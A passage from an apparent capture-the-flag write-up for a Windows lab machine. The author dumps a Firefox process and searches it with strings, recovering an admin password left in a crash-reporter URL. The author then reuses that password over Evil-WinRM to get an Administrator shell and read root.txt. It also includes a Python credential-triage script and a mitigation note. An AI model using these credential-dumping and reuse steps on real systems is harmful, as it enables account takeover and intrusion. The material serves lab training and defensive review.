[20:55:16] Dump 1 complete: 3 MB written in 0.2 seconds
[20:55:17] Dump count reached.

We can also use Strings to search the dump for readable text.
https://docs.microsoft.com/en-us/sysinternals/downloads/strings

Evil-WinRM PS C:\Users\Chase\Documents> dir

Directory: C:\Users\Chase\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/17/2020   8:55 PM        2463710 firefox.exe_201217_205516.dmp
-a----       12/17/2020   8:54 PM         384888 procdump64.exe
-a----       12/17/2020   8:55 PM         448888 strings64.exe
-a----       12/17/2020   5:08 PM          35107 winPEAS.bat

Evil-WinRM PS C:\Users\Chase\Documents> ./strings64.exe firefox.exe_201217_205516.dmp

Among the results we find:

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Chase\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=SUPPORTDESK
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Windows\system32
LOCALAPPDATA=C:\Users\Chase\AppData\Local
MOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports
MOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\events
MOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending Pings
MOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exe
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini
NUMBER_OF_PROCESSORS=4
OS=Windows_NT
Path=C:\Program Files\PHP\v7.3;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
PROCESSOR_LEVEL=23
PROCESSOR_REVISION=0102
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Chase\AppData\LocalLow\Mozilla\Temp-{2bfdbb49-297a-4ae0-b21c-091a5f5d9a81}
TMP=C:\Users\Chase\AppData\LocalLow\Mozilla\Temp-{2bfdbb49-297a-4ae0-b21c-091a5f5d9a81}
USERDOMAIN=SUPPORTDESK
USERNAME=Chase
USERPROFILE=C:\Users\Chase
windir=C:\Windows
__PSLockdownPolicy=1
pjA
\\.\DISPLAY1
C:\Windows\SYSTEM32\mscms.dll

MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Here is a web request:

localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

From here:

  • login_username = admin@support.htb
  • login_password = 4dD!5}x/re8]FBuZ
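The manual "run strings and look for a password" step above can be turned into a repeatable triage check, and the same check is useful from the defensive side when reviewing crash dumps or core files before they are shipped to a vendor. The following Python script is an added example, not part of the writeup and not Sysinternals Strings: it extracts printable runs from a byte buffer the way `strings` does (default minimum length 4, ASCII only), then parses every URL that carries a query string and reports parameters whose names look like secrets. The dump bytes are constructed from lines shown above, not a real process dump.

```python
import re
from urllib.parse import parse_qs, urlsplit

MIN_RUN = 4  # Sysinternals strings' default minimum string length
_PRINTABLE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_RUN)
# parameter names that usually carry a secret
_SECRET_PARAM = re.compile(r"pass|pwd|secret|token|key", re.I)
# host/path?query, with or without a scheme (crash-reporter args drop it)
_URL_WITH_QUERY = re.compile(r"(?:https?://)?[\w.:-]+/[^\s\"'<>]*\?[^\s\"'<>]+")


def extract_strings(blob: bytes):
    """Yield printable ASCII runs of at least MIN_RUN bytes, as 'strings' would."""
    for m in _PRINTABLE.finditer(blob):
        yield m.group().decode("ascii")


def find_credentials_in_urls(blob: bytes) -> list:
    """Return (url, parameter, value) for every secret-looking query parameter found."""
    hits = []
    for s in extract_strings(blob):
        for url in _URL_WITH_QUERY.findall(s):
            # urlsplit needs a scheme to split host from path correctly
            query = urlsplit(url if "://" in url else "http://" + url).query
            for name, values in parse_qs(query, keep_blank_values=True).items():
                if _SECRET_PARAM.search(name):
                    for value in values:
                        hits.append((url, name, value))
    return hits


# Constructed dump: binary noise around a few of the environment strings
# that the real firefox.exe dump contained (see the strings output above).
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00"
    b"USERNAME=Chase\x00"
    b"MOZ_CRASHREPORTER_RESTART_ARG_0=C:\\Program Files\\Mozilla Firefox\\firefox.exe\x00"
    b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb"
    b"&login_password=4dD!5}x/re8]FBuZ&login=\x00"
    b"\xff\xfe\x00\x00pjA\x00"
)

if __name__ == "__main__":
    for url, name, value in find_credentials_in_urls(SAMPLE_DUMP):
        print("%s -> %s = %s" % (url, name, value))
```

The mitigation this points at is on the web application, not the browser: the login form submitted its credentials in a GET query string, so the password ended up in the URL, which Firefox then copied into its crash-reporter restart arguments and kept in process memory. Credentials belong in a POST body over TLS; a query string is also written to browser history, proxy logs and the IIS access log.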

Accessing http://10.10.10.149/login.php again with the credentials we've just found gives us access to http://10.10.10.149/issues.php.

The same password is also valid for the local Administrator account over WinRM:

$evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Evil-WinRM PS C:\Users\Administrator\Documents> whoami

supportdesk\administrator

Evil-WinRM PS C:\Users\Administrator\Documents> cd ..
Evil-WinRM PS C:\Users\Administrator> cd Desktop

Evil-WinRM PS C:\Users\Administrator\Desktop> type root.txt

50dfXXXXXXXXXXXXXXXXXXXXXXXXXXXX
